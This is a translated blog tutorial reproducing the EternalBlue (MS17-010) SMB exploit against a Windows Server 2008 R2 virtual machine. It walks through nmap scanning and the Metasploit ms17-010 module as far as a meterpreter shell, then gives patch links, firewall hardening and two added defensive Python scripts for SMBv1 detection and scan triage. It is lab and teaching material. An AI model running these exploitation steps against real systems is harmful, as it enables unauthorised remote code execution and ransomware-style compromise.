Foreword
Hello everyone, this is the second blog post I have written on CSDN. When I was doing hands-on practice, like everyone else I found that the tutorials and materials were a mixed bag: either the articles were low quality or they were not detailed enough, so I skipped them. Many steps led to all kinds of obstacles during actual reproduction, and when I searched for the error messages I could not find the information. Technique in the security community tends to stay inside the community, which makes it hard to break in. I have met a lot of friends who want to get started, so from now on I will write posts about my own learning path, the ideas behind each hands-on exercise, and the problems I ran into. I hope it helps everyone, and I also hope some experts will drop by to guide me so that we can all make progress together.
First look at EternalBlue
Introduction
EternalBlue is one of the large batch of network attack tools that the hacker group Shadow Brokers released on the evening of April 14, 2017. "EternalBlue" exploits an SMB vulnerability in Windows to obtain the highest privilege on the system. On May 12, criminals built the WannaCry ransomware by modifying "EternalBlue". Many university intranets, large enterprise intranets and government agency private networks in the UK, Russia, Europe and China were infected and extorted: a high ransom was demanded to decrypt the affected files.
Principle
EternalBlue is a vulnerability in the way the Windows SMB service handles SMB v1 requests; it allows an attacker to execute arbitrary code on the target system. Through this vulnerability, Windows machines with TCP port 445 (file sharing) open can be scanned and, with no user interaction at all, criminals can implant ransomware, remote-control Trojans, cryptocurrency miners and other malware onto computers and servers, as long as the machines are powered on and connected to the Internet.
SMB protocol
SMB (Server Message Block) is a client/server, request/response protocol. Files, printers, named pipes and other resources can be shared between computers over SMB; the Network Neighborhood on a Windows computer is implemented with SMB. The SMB protocol works at the application and session layers and can run on top of TCP/IP. SMB uses TCP port 139 and TCP port 445. If you want to study the protocol in depth, look at the OSI seven-layer model, which I will not go into in this chapter.
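As an added example (not from the original post), the Python below parses raw SMB messages as they appear on TCP 445: the 4-byte NetBIOS session header, then the SMB1 (0xFF "SMB") or SMB2 (0xFE "SMB") header, and, for a NEGOTIATE request, the dialects the client offers. A defender can run this over captured port-445 payloads to find clients that still negotiate SMBv1, the protocol version EternalBlue abuses. The two messages embedded in it are constructed here, not captured from any host.

```python
import struct

# Added example (not from the original post): classify SMB messages seen on
# TCP 445 and flag SMBv1 negotiation, the dialect family MS17-010 targets.

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB1_COM_NEGOTIATE = 0x72      # SMB_COM_NEGOTIATE in SMB1
SMB2_NEGOTIATE = 0x0000        # NEGOTIATE command in SMB2
SMB2_DIALECT_NAMES = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1",
                      0x0300: "SMB 3.0", 0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}


def parse_smb_payload(tcp_payload):
    """Return {'version', 'negotiate', 'dialects'} for one SMB message on port 445.

    Direct-hosted SMB over 445 prefixes each message with a 4-byte NetBIOS
    session header: type byte (0x00 = session message) + 24-bit big-endian length.
    """
    if len(tcp_payload) < 4:
        raise ValueError("too short for a NetBIOS session header")
    nb_type = tcp_payload[0]
    nb_len = int.from_bytes(tcp_payload[1:4], "big")
    if nb_type != 0x00:
        raise ValueError("unexpected NetBIOS session type 0x%02x" % nb_type)
    msg = tcp_payload[4:4 + nb_len]
    if len(msg) != nb_len:
        raise ValueError("truncated SMB message")
    if msg[:4] == SMB1_MAGIC:
        return _parse_smb1(msg)
    if msg[:4] == SMB2_MAGIC:
        return _parse_smb2(msg)
    raise ValueError("payload does not start with an SMB header")


def _parse_smb1(msg):
    # SMB1 header is 32 bytes: magic(4) command(1) status(4) flags(1) flags2(2)
    # pidhigh(2) signature(8) reserved(2) tid(2) pid(2) uid(2) mid(2)
    if len(msg) < 33:
        raise ValueError("truncated SMB1 header")
    command = msg[4]
    info = {"version": "SMB1", "negotiate": command == SMB1_COM_NEGOTIATE, "dialects": []}
    if info["negotiate"]:
        word_count = msg[32]                       # parameter words; 0 for NEGOTIATE
        off = 33 + 2 * word_count
        byte_count = struct.unpack_from("<H", msg, off)[0]
        data = msg[off + 2:off + 2 + byte_count]
        # Each dialect is a 0x02 buffer-format byte + NUL-terminated ASCII string
        for chunk in data.split(b"\x00"):
            if chunk.startswith(b"\x02"):
                info["dialects"].append(chunk[1:].decode("ascii", "replace"))
    return info


def _parse_smb2(msg):
    # SMB2 header is 64 bytes; Command is the uint16 at offset 12
    if len(msg) < 64:
        raise ValueError("truncated SMB2 header")
    command = struct.unpack_from("<H", msg, 12)[0]
    info = {"version": "SMB2", "negotiate": command == SMB2_NEGOTIATE, "dialects": []}
    if info["negotiate"]:
        dialect_count = struct.unpack_from("<H", msg, 64 + 2)[0]
        # The Dialects array starts at offset 36 of the NEGOTIATE request body
        codes = struct.unpack_from("<%dH" % dialect_count, msg, 64 + 36)
        info["dialects"] = [SMB2_DIALECT_NAMES.get(c, "0x%04x" % c) for c in codes]
    return info


def uses_smb1(payloads):
    """True if any message in the stream is an SMB1 NEGOTIATE (legacy SMBv1 in use)."""
    for p in payloads:
        try:
            r = parse_smb_payload(p)
        except ValueError:
            continue
        if r["version"] == "SMB1" and r["negotiate"]:
            return True
    return False


def _nb_frame(msg):
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


# Constructed sample messages (built here, not captured from a real host)
_smb1_hdr = SMB1_MAGIC + bytes([SMB1_COM_NEGOTIATE]) + b"\x00" * 27
_smb1_dialects = b"\x02PC NETWORK PROGRAM 1.0\x00\x02NT LM 0.12\x00"
SAMPLE_SMB1_NEGOTIATE = _nb_frame(_smb1_hdr + b"\x00" + struct.pack("<H", len(_smb1_dialects)) + _smb1_dialects)

_smb2_hdr = SMB2_MAGIC + struct.pack("<H", 64) + b"\x00" * 58   # Command field = 0 (NEGOTIATE)
_smb2_body = struct.pack("<HHHHI", 36, 2, 1, 0, 0) + b"\x00" * 24 + struct.pack("<HH", 0x0202, 0x0210)
SAMPLE_SMB2_NEGOTIATE = _nb_frame(_smb2_hdr + _smb2_body)

if __name__ == "__main__":
    print(parse_smb_payload(SAMPLE_SMB1_NEGOTIATE))
    print(parse_smb_payload(SAMPLE_SMB2_NEGOTIATE))
    print("SMBv1 seen:", uses_smb1([SAMPLE_SMB2_NEGOTIATE, SAMPLE_SMB1_NEGOTIATE]))
```

Feed `uses_smb1` the reassembled TCP payloads of a port-445 stream (for example, exported from a packet capture) and any client that still offers the "NT LM 0.12" dialect shows up as an SMBv1 talker that should be patched or moved to SMB2/3.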
Attack methods
The malicious code scans for Windows machines with the 445 file-sharing port open. Without any user action, as long as the machine is powered on and connected to the Internet, criminals can implant ransomware, remote-control Trojans, cryptocurrency miners and other malicious programs onto computers and servers.
In this incident the attackers used Petwrap, a variant of the Petya ransomware. The EternalBlue vulnerability was again used during the attack, and system usernames and passwords were harvested for propagation across the intranet.
This outbreak combined several network self-replication techniques, including known Office vulnerabilities, the EternalBlue SMB vulnerability and LAN infection, which let the virus spread explosively in a short time. Unlike ordinary ransomware, this virus does not encrypt every file on the computer. Instead it encrypts the hard drive's master file table (MFT) and renders the master boot record (MBR) inoperable; because the MFT holds the name, size and location of every file on the disk, access to the whole system is cut off and the computer cannot boot. It is more destructive to the system than ordinary ransomware.
Hands-on stage
Environment layout for reproduction
Target machine, attacker machine, intranet environment
Target machine: Windows Server 2008 R2 (no setup required; the firewall does not need to be turned off)
Attacker machine: Kali Linux, BlackArch Linux
Vulnerability identifiers for EternalBlue
CVE-2017-0146
MS17-010
………….
Preparing the attacker machine and target machine
So as not to affect the security of the network, I chose to reproduce this locally in the intranet environment of VMware virtual machines. I personally prefer BlackArch, but with everyone's learning in mind I chose Kali for the hands-on work that follows. The target system I chose is a server OS that is still in use: in the mindset of an operations engineer, if there is no need to upgrade you don't upgrade, and patches can go unapplied indefinitely, because stability comes first. That is why this system is used for the demonstration. At the end of the article I will list the systems affected by the EternalBlue vulnerability. Now let's get into the reproduction phase:
Determine the IPs of the attacker machine and target machine
ifconfig ##View IP information on a Linux system
Kali Linux 2023 IP: 192.168.137.186
Windows Server 2008 R2 IP: 192.168.137.111
ipconfig ##View IP information on a Windows system
Probe the target host
We only have the IP; we do not yet know which ports and services this target has open. But we do know that this exercise reproduces the EternalBlue vulnerability, so we could guess, or we could scan. Let's scan first: the ports the target has open and the services running on them.
Here I use the nmap scanner, which I think is one of the easier tools to use among the many scanners available.
nmap -T4 -O -v -sV 192.168.137.111
Parameters:
-T4 ##Set the timing template (0-5); think of it as the scan speed, larger is faster
-O ##Operating system detection
-v ##Increase output verbosity
-sV ##Service and version detection
Scan results:
As you can see, port 445 on the target is open with the service microsoft-ds, and the scan also reports the target's system version.
We could now attack based on the published intelligence, but some friends may ask: since we want to exploit a vulnerability, how do we know its identifier? Fine, let's scan for it!
nmap --script=vuln 192.168.137.111 -v
--script ##Run NSE scripts
vuln ##The built-in vulnerability-scanning script category
Scan results:
When the scan reports ms17-010, the EternalBlue vulnerability identifier, we can be fairly sure the host is vulnerable to EternalBlue, and we start the attack attempt.
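As an added example (not part of the original post), here is a Python script that reads the XML that `nmap -oX` writes for a scan like the one above and turns it into a remediation list: hosts where the smb-vuln-ms17-010 host script reports VULNERABLE come first, then hosts that merely expose 445. The XML embedded in it is constructed to mirror nmap's output format, not a real scan, and the table key reuses the CVE identifier listed earlier in this post.

```python
import xml.etree.ElementTree as ET

# Added example (not from the original post): turn `nmap --script=vuln -oX scan.xml`
# output into a patch-priority list for the defenders of the scanned network.

SCRIPT_ID = "smb-vuln-ms17-010"

# Constructed sample in the shape of nmap's -oX output (illustrative, not a real scan).
# The <table key> mirrors the CVE identifier cited in this post's vulnerability list.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap --script=vuln -sV -oX scan.xml 192.168.137.0/24">
  <host><status state="up"/>
    <address addr="192.168.137.111" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
      <service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 - 2012 microsoft-ds"/>
    </port></ports>
    <hostscript><script id="smb-vuln-ms17-010" output="VULNERABLE">
      <table key="CVE-2017-0146">
        <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
        <elem key="state">VULNERABLE</elem>
      </table>
    </script></hostscript>
  </host>
  <host><status state="up"/>
    <address addr="192.168.137.120" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
      <service name="microsoft-ds"/></port></ports>
    <hostscript><script id="smb-vuln-ms17-010" output="Could not connect to IPC share"/></hostscript>
  </host>
  <host><status state="up"/>
    <address addr="192.168.137.130" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered" reason="no-response"/></port></ports>
  </host>
</nmaprun>
"""

PRIORITY = {"VULNERABLE": 0, "no-finding": 1, "not-checked": 2}


def triage_ms17_010(xml_text):
    """Return one dict per host, highest remediation priority first."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        addr = None
        for a in host.findall("address"):
            if a.get("addrtype") == "ipv4":
                addr = a.get("addr")
        port_state = "closed"
        product = ""
        for port in host.iter("port"):
            if port.get("protocol") == "tcp" and port.get("portid") == "445":
                port_state = port.find("state").get("state")
                svc = port.find("service")
                if svc is not None:
                    product = svc.get("product", "")
        verdict = "not-checked"
        # NSE host scripts sit under <hostscript>, port scripts under <port>; iter() covers both
        for script in host.iter("script"):
            if script.get("id") != SCRIPT_ID:
                continue
            states = [e.text for e in script.iter("elem") if e.get("key") == "state"]
            verdict = "VULNERABLE" if "VULNERABLE" in states else "no-finding"
        if verdict == "VULNERABLE":
            action = "apply the MS17-010 patch for this Windows version now; block TCP 445 until done"
        elif port_state == "open":
            action = "445 reachable; verify the MS17-010 patch is installed"
        else:
            action = "445 not reachable from the scanner; confirm the firewall rule is intentional"
        rows.append({"host": addr, "smb_445": port_state, "product": product,
                     "ms17_010": verdict, "action": action})
    rows.sort(key=lambda r: (PRIORITY[r["ms17_010"]], r["smb_445"] != "open"))
    return rows


if __name__ == "__main__":
    for row in triage_ms17_010(SAMPLE_NMAP_XML):
        print("%-16s 445=%-9s %-12s %s" % (row["host"], row["smb_445"], row["ms17_010"], row["action"]))
```

Run the real scan with `-oX scan.xml` added, read that file into `triage_ms17_010`, and the output is the order in which to apply the patches from the hardening section below; a host with 445 open but no finding is not cleared, since the script can fail for reasons unrelated to the patch (the second sample host shows that case).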
MSF vulnerability exploitation
The commands used this time with the msf framework:
msfconsole ##Start the framework
search ##Search for modules
use ##Select a module
show options ##Show the module's parameters
set ##Set the required items
run/exploit ##Execute
Find related vulnerabilities
We start the framework, enter the msf console, and search for EternalBlue:
msfconsole
search ms17-010
Here we see that the first module is in a usable state, so we use it.
use 0
Set required parameters
To set this module's parameters we first check what they are; we only need to set the more important ones.
show options
Here the msf console indicates that only one parameter is required:
RHOSTS ##The IP address of the target machine
We can also allocate threads, but not too many: if the thread count is too high the target will easily crash with a blue screen.
THREAD ##Number of threads
Set the target machine's IP and allocate threads:
set rhosts 192.168.137.111
set thread 10
Perform Attack
After setting the parameters, run the attack.
run ##or: exploit
The [*] and [+] on the left are status markers. As long as no [-] appears, the intrusion basically succeeds.
In some cases there will be a lot of minus signs and an error message containing the word FAIL in the middle. Generally you don't need to worry about it; if the attack doesn't work, just change the number of threads (I solved it this way, but it's obviously just a coincidence; I don't know about other situations).
Seeing this console appear means you have successfully entered the target machine.
meterpreter> ps ##View the processes on the target machine
After entering the shell, you get a command-line environment on the target machine.
shell
Systems affected by the EternalBlue vulnerability
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8.1
Windows 10
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
Hardening plan
1. Download the patch provided by Microsoft
Find the matching entry for your system in the list below:
① Install the latest patches: download the patches for all affected versions and label them accordingly. Note: check the current Windows version before installing a patch (right-click "My Computer" and select "Properties").
Product (Down-level) | Release Date | CDN Link
--- | --- | ---
Security Update for Windows Server 2003 for x64-based Systems (KB4012598) | 5/13/2017 | http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe
Security Update for Windows 8 for x64-based Systems (KB4012598) | 5/13/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu
Security Update for Windows 8 (KB4012598) | 5/13/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu
Security Update for Windows XP SP3 for XPe (KB4012598) | 5/13/2017 | http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe
Security Update for Windows XP SP3 (KB4012598) | 5/13/2017 | http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe
Security Update for Windows Server 2003 (KB4012598) | 5/13/2017 | http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe
Security Update for Windows XP SP2 for x64-based Systems (KB4012598) | 5/13/2017 | http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe
Security Update for Windows Vista (KB4012598) - Windows Vista | 3/14/2017 | http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe
Security Update for Windows Server 2008 (KB4012598) - Windows Server 2008 | 3/14/2017 | http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.0-kb4012598-x86_13e9b3d77ba5599764c296075a796c16a85c745c.msu
Security Update for Windows Vista for x64-based Systems (KB4012598) - Windows Vista | 3/14/2017 | http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.0-kb4012598-x64_6a186ba2b2b98b2144b50f88baf33a5fa53b5d76.msu
Security Update for Windows Server 2008 for Itanium-based Systems (KB4012598) - Windows Server 2008 | 3/14/2017 | http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.0-kb4012598-ia64_83a6f5a70588b27623b11c42f1c8124a25d489de.msu
Security Update for Windows Server 2008 for x64-based Systems (KB4012598) - Windows Server 2008 | 3/14/2017 | http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.0-kb4012598-x64_6a186ba2b2b98b2144b50f88baf33a5fa53b5d76.msu
Security Update for WES09 and POSReady 2009 (KB4012598) - Windows XP Embedded | 3/14/2017 | http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windowsxp-kb4012598-x86-embedded-enu_9515c11bc77e39695b83cb6f0e41119387580e30.exe
March, 2017 Security Only Quality Update for Windows 7 for x64-based Systems (KB4012212) | 3/14/2017 | http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu
March, 2017 Security Only Quality Update for Windows 7 (KB4012212) | 3/14/2017 | http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x86_6bb04d3971bb58ae4bac44219e7169812914df3f.msu
March, 2017 Security Only Quality Update for Windows Embedded Standard 7 (KB4012212) | 3/14/2017 | http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x86_6bb04d3971bb58ae4bac44219e7169812914df3f.msu
March, 2017 Security Only Quality Update for Windows Embedded Standard 7 for x64-based Systems (KB4012212) | 3/14/2017 | http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu
March, 2017 Security Only Quality Update for Windows Server 2008 R2 for x64-based Systems (KB4012212) | 3/14/2017 | http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu
March, 2017 Security Only Quality Update for Windows Server 2008 R2 for Itanium-based Systems (KB4012212) | 3/14/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-ia64_93a42b16dbea87fa04e2b527676a499f9fbba554.msu
March, 2017 Security Only Quality Update for Windows 8.1 (KB4012213) - Windows 8.1 | 3/14/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8.1-kb4012213-x86_e118939b397bc983971c88d9c9ecc8cbec471b05.msu
March, 2017 Security Only Quality Update for Windows 8.1 for x64-based Systems (KB4012213) - Windows 8.1 | 3/14/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8.1-kb4012213-x64_5b24b9ca5a123a844ed793e0f2be974148520349.msu
March, 2017 Security Only Quality Update for Windows Server 2012 R2 (KB4012213) - Windows Server 2012 R2 | 3/14/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8.1-kb4012213-x64_5b24b9ca5a123a844ed793e0f2be974148520349.msu
March, 2017 Security Only Quality Update for Windows Embedded 8 Standard (KB4012214) | 3/14/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8-rt-kb4012214-x86_5e7e78f67d65838d198aa881a87a31345952d78e.msu
March, 2017 Security Only Quality Update for Windows Embedded 8 Standard for x64-based Systems (KB4012214) | 3/14/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8-rt-kb4012214-x64_b14951d29cb4fd880948f5204d54721e64c9942b.msu
March, 2017 Security Only Quality Update for Windows Server 2012 (KB4012214) | 3/14/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/02/windows8-rt-kb4012214-x64_b14951d29cb4fd880948f5204d54721e64c9942b.msu

Most current Windows 10 cumulative updates - May 2017

Windows 10 branch | Product | Release Date | CDN Link
--- | --- | --- | ---
Windows 10 | 2017-05 Cumulative Update for Windows 10 for x64-based Systems (KB4019474) | 5/9/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019474-x64_4ed033d1c2af2daea1298d10da1fad15a482f726.msu
Windows 10 | 2017-05 Cumulative Update for Windows 10 for x86-based Systems (KB4019474) | 5/9/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019474-x86_259adeed4a4037f749afab211ff1bc6a771ff7f6.msu
Windows 10 Version 1511 | 2017-05 Cumulative Update for Windows 10 Version 1511 (KB4019473) | 5/9/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019473-x86_5e2b7bce2f1b116288b4f1f78449c66ecc7c7a53.msu
Windows 10 Version 1511 | 2017-05 Cumulative Update for Windows 10 Version 1511 for x64-based Systems (KB4019473) | 5/9/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019473-x64_c23b6f55caf1b9d6c14161b66fe9c9dfb4ad475c.msu
Windows 10 Version 1607 & Windows Server 2016 | 2017-05 Cumulative Update for Windows Server 2016 for x64-based Systems (KB4019472) | 5/9/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019472-x64_dda304140351259fcf15ca7b1f5b51cb60445a0a.msu
Windows 10 Version 1607 & Windows Server 2016 | 2017-05 Cumulative Update for Windows 10 Version 1607 for x64-based Systems (KB4019472) | 5/9/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019472-x64_dda304140351259fcf15ca7b1f5b51cb60445a0a.msu
Windows 10 Version 1607 & Windows Server 2016 | 2017-05 Cumulative Update for Windows 10 Version 1607 for x86-based Systems (KB4019472) | 5/9/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4019472-x86_9bf106e898b57c20917cd98fd8b8d250333015a5.msu
Windows 10 Version 1703 | 2017-05 Cumulative Update for Windows 10 Version 1703 for x64-based Systems (KB4016871) - Windows 10 | 5/9/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4016871-x64_27dfce9dbd92670711822de2f5f5ce0151551b7d.msu
Windows 10 Version 1703 | 2017-05 Cumulative Update for Windows 10 Version 1703 for x86-based Systems (KB4016871) - Windows 10 | 5/9/2017 | http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows10.0-kb4016871-x86_5901409e58d1c6c9440e420d99c42b08f227356e.msu
2. Manual repair and hardening
I won't show pictures here; just follow the steps.
Disable the Server service
Click Start, and then click Control Panel (or point to Settings, and then click Control Panel)
Double-click “Administrative Tools”
Double-click “Services”
Double-click “Server”
In the Startup type list, click Disabled
Click Stop and then OK
Block TCP ports 135, 137, 138, 139 and 445 at the firewall
On Windows XP, enable Windows Firewall (Network Setup Wizard):
Click Start, then Control Panel
Double-click "Network Connections", then click "Change Windows Firewall Settings"
On the General tab, make sure "Enable (recommended)" is selected; this enables Windows Firewall
After enabling Windows Firewall, select "Don't allow exceptions" to block all incoming traffic
On Windows Server 2003, enable Windows Firewall (Network Setup Wizard):
Click "Start", then click "Control Panel"
In the default Category View, click "Network and Internet Connections", then click "Network Connections"
Right-click the connection on which you want to enable Internet Connection Firewall and click "Properties"
Click the "Advanced" tab
Select the "Protect my computer or network by restricting or blocking access to this computer from the Internet" checkbox
Click OK
On Windows Vista or later, enable Windows Firewall:
Click "Start", then click "Control Panel"
Click "Windows Firewall" to configure Windows Firewall
Click "Turn Windows Firewall on or off" to define the firewall settings for each network type; turn Windows Firewall on for private and public networks
Click "Advanced Settings" >> Inbound Rules >> New Rule
Select "Port", then Next
Under specific local ports, enter the ports to close: 445, 135, 137, 138, 139, then Next
Select "Block the connection", then Next
Under Profile, select all, then Next
Enter any name you like and click Finish
End
Okay, that is the content of this post. I hope it helps everyone (if you don't like it, please don't complain). Keep an open-source spirit and let's make progress together!!